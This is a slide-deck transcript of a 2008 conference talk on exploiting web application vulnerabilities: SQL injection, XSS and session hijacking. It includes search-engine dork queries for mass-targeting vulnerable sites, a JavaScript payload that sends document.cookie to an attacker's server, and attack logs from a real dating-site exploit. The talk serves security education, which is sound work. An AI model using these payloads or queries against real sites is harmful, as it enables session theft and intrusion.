Starwest 2008


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Starwest 2008

    1. 1. Caleb Sima Chief Technologist – Application Security Center Exploiting Web Security Vulnerabilities
    2. 2. Who am I? <ul><li>Founder and CTO of SPI Dynamics </li></ul><ul><li>In security for 11 years </li></ul><ul><li>Author of Hacking Web Applications Exposed </li></ul><ul><li>Frequent speaker (blackhat, RSA, Infosec) </li></ul><ul><li>S1 1996-1997 </li></ul><ul><li>ISS X-force/Pentest 1997-2000 </li></ul><ul><li>SPI 2000-2007 </li></ul><ul><li>Current Chief Technologist for HP Application Security </li></ul><ul><li>Caleb Sima ( </li></ul>
    3. 3. Who is(was) SPI Dynamics? <ul><li>Founded in 2000 </li></ul><ul><li>140+ Employees </li></ul><ul><li>1200+ Customers </li></ul><ul><li>Team of security experts – SPI Labs </li></ul><ul><li>“ We create software to identify how hackers break into websites” </li></ul>
    4. 4. Agenda <ul><li>Platform Issues </li></ul><ul><li>Mis-configurations </li></ul><ul><li>HTTP </li></ul><ul><li>HOW TO: SQL Injection </li></ul><ul><li>HOW TO: Blind SQL Injection </li></ul><ul><li>Hacking an online dating website – XSS (Real) </li></ul><ul><li>HOW TO: Session Hijacking </li></ul><ul><li>Mis-configurations / Privilege escalations (Real) </li></ul><ul><li>College online registration hack (Real) </li></ul><ul><li>Hacking an online bank (Real) </li></ul><ul><li>Touch on AJAX </li></ul>
    5. 5. Web Applications Breach the Perimeter Internet DMZ Trusted Inside Corporate Inside HTTP(S) IMAP FTP SSH TELNET POP3 Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server. Any – Web Server: 80 Firewall only allows applications on the web server to talk to application server. Firewall only allows application server to talk to database server. IIS SunOne Apache ASP .NET WebSphere Java SQL Oracle DB2
    6. 6. Web Application Vulnerabilities Platform Administration Application Known Vulnerabilities Extension Checking Common File Checks Data Extension Checking Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsin g Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Web application vulnerabilities occur in multiple areas.
    7. 7. Essential HTTP Tools <ul><li>[Firefox] Firebug </li></ul><ul><li>[Firefox] Live HTT P Headers </li></ul><ul><li>[Firefox] HTTPFox </li></ul><ul><li>[IE] IEWatch </li></ul><ul><li>Microsoft Fiddler </li></ul><ul><li>HP ASC Toolkit </li></ul><ul><li>Burp Proxy </li></ul><ul><li>[Firefox] Developers toolkit </li></ul>
    9. 9. Google Hacking <ul><li>Find vulnerable sites using Google (Old method – new life) </li></ul><ul><li>Example Search Queries </li></ul><ul><ul><li>“ filetype:mdb inurl:admin” – 180 results </li></ul></ul><ul><ul><li>“ Filetype:xls inurl:admin” – 14,100 results </li></ul></ul><ul><ul><li>“ ORA-00921: unexpected end of SQL command” – 3,470 results </li></ul></ul><ul><ul><li>“ allintitle:Netscape Enterprise Server Home Page” – 431 results </li></ul></ul>
    10. 10. Mass Exploitation <ul><li>Use search engines to narrow your attack victims. </li></ul><ul><li>“ inurl:id= filetype:asp site:gov” – 572,000 results </li></ul><ul><li>“ inurl:id= filetype:asp site:com” – 7,150,000 results </li></ul><ul><li>“ inurl:id= filetype:asp site:org” – 3,240,000 results </li></ul><ul><li>Use this list as a baseline for identifying SQL injection vulnerabilities </li></ul>
    11. 11. Mass Exploitation using Google <ul><li>Took 1 hour of coding </li></ul><ul><li>500 vulnerable sites were found in 1 minute and 26 seconds </li></ul>
    12. 12. Massive Automation
    13. 13. SQL Injection Worms <ul><li>4/24/2008 – 510,000 Infected Sites </li></ul><ul><ul><li> </li></ul></ul><ul><li>1/8/2008 – 70,000 Infected Sites </li></ul><ul><ul><li>;683627551 </li></ul></ul>
    15. 15. Simple XSS Checking
    16. 16. Fill in the forms
    17. 17. User input is reflected back
    18. 18. Let’s try some javascript
    19. 19. Bingo!
    20. 20. XSS on a large scale <ul><li>Create a simple profile </li></ul><ul><li>Which text is seen by the most people? </li></ul>
    21. 21. Let’s run a test <ul><li>Plain vanilla XSS entry in the headline </li></ul>
    22. 22. Let’s view the profile and see what happens
    23. 23. Success!
    24. 24. Does it execute in a displayed list of results?
    25. 25. Yes it does.
    26. 26. Create an external JS file 1. Attacker creates exploit profile 2. Victim executes date search 3. Headline is viewed. Exploited 4. Victim requests attack payload 5. Payload delivered. 6. Victim sends cookie to attacker Dating Website Attack Server
    27. 27. Create the exploit payload <ul><li>document.write(&quot;<img src= &quot; + document.cookie + &quot; width=0 >&quot;) </li></ul>
    28. 28. Let’s execute the attack <ul><li>Embed the script to download from the attackers server. </li></ul>
    29. 29. View the profile <ul><li>Success. Invisible execution </li></ul>
    30. 30. Execute the attack via search <ul><li>Everything looks normal </li></ul>
    31. 31. Check out the attack logs <ul><li>2006-08-31 19:54:47 GET /a.js - 80 – Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0 </li></ul><ul><li>2006-08-31 19:54:47 GET /pIDCode=2AD4A95012D09660 - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2 </li></ul><ul><li>2006-08-31 19:55:48 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0 </li></ul><ul><li>2006-08-31 19:55:48 GET /pIDCode=2AD4A95012D01871 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2 </li></ul><ul><li>2006-08-31 19:56:33 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0 </li></ul><ul><li>2006-08-31 19:56:33 GET /pIDCode=2AD4A95012D04309 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2 </li></ul>
    32. 32. <ul><li>Social networking – the more people who make you their “friend,” the more popular you are </li></ul><ul><li>Personal spaces highly customizable, including upload of HTML that displays to other users </li></ul><ul><li>Uh-oh… </li></ul><ul><li>What if I could “infect” everyone who viewed my profile and automatically make me their friend? </li></ul>
    33. 33. The Result Victim browser Evil profile on Victim profile on 1 Caleb Victim becomes “carrier” and can now infect others, worm propagates
    34. 34. Hilarity <ul><li>10/04, 12:34 pm: You have 73 friends. </li></ul><ul><li>1 hour later, 1:30 am: You have 73 friends and 1 friend request. </li></ul><ul><li>7 hours later, 8:35 am: You have 74 friends and 221 friend requests. </li></ul><ul><ul><li>“ Woah. I did not expect this much. I'm surprised it even worked..” </li></ul></ul><ul><li>1 hour later, 9:30 am: You have 74 friends and 480 friend requests. </li></ul><ul><ul><li>“ Oh wait, it's exponential, isn't it. Crap. “ </li></ul></ul><ul><li>1 hour later, 10:30 am: You have 518 friends and 561 friend requests. </li></ul><ul><li>3 hours later, 1:30 pm: You have 2,503 friends and 6,373 friend requests </li></ul><ul><ul><li>“ I'm canceling my account. This has gotten out of control.” </li></ul></ul><ul><li>5 hours later, 6:20 pm: You have 2,503 friends. 917,084 friend requests </li></ul><ul><ul><li>“ I timidly go to my profile to view the friend requests. It's official. I'm popular.” </li></ul></ul>
    35. 35. Real Exploitation <ul><li>Browser Zombies </li></ul><ul><li>Control any victim browser </li></ul><ul><li>Capture keystrokes </li></ul><ul><li>Capture browsing activity </li></ul><ul><li>Force the user to view sites of your choosing </li></ul>
    36. 36. Consumable Input <ul><li>Filenames </li></ul><ul><li>Contents of files </li></ul><ul><li>RFID Tags </li></ul><ul><li>Credit Cards </li></ul><ul><li>Barcodes </li></ul><ul><li>Flash/Ajax/Silverlight </li></ul>
    37. 37. Welcome to the Age of User Generated Content
    38. 38. Why Web Application Risks Occur Security Professionals Don’t Know The Applications <ul><ul><li>“ As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.” </li></ul></ul>The Web Application Security Gap <ul><ul><li>“ As a Network Security Professional, I don’t know how my companies web applications are supposed to work so I deploy a protective solution…but don’t know if it’s protecting what it’s supposed to.” </li></ul></ul>Application Developers and QA Professionals Don’t Know Security
    39. 39. What we do Enterprise Application Security Assurance Assessment Management Platform (AMP) Source Code Validation QA/Integration Testing Production Assessment DevInspect QAInspect WebInspect Plan Requirements Design Build Production Test Enterprise Security Assurance & Reporting
    40. 40. [email_address] <ul><li>Questions? </li></ul>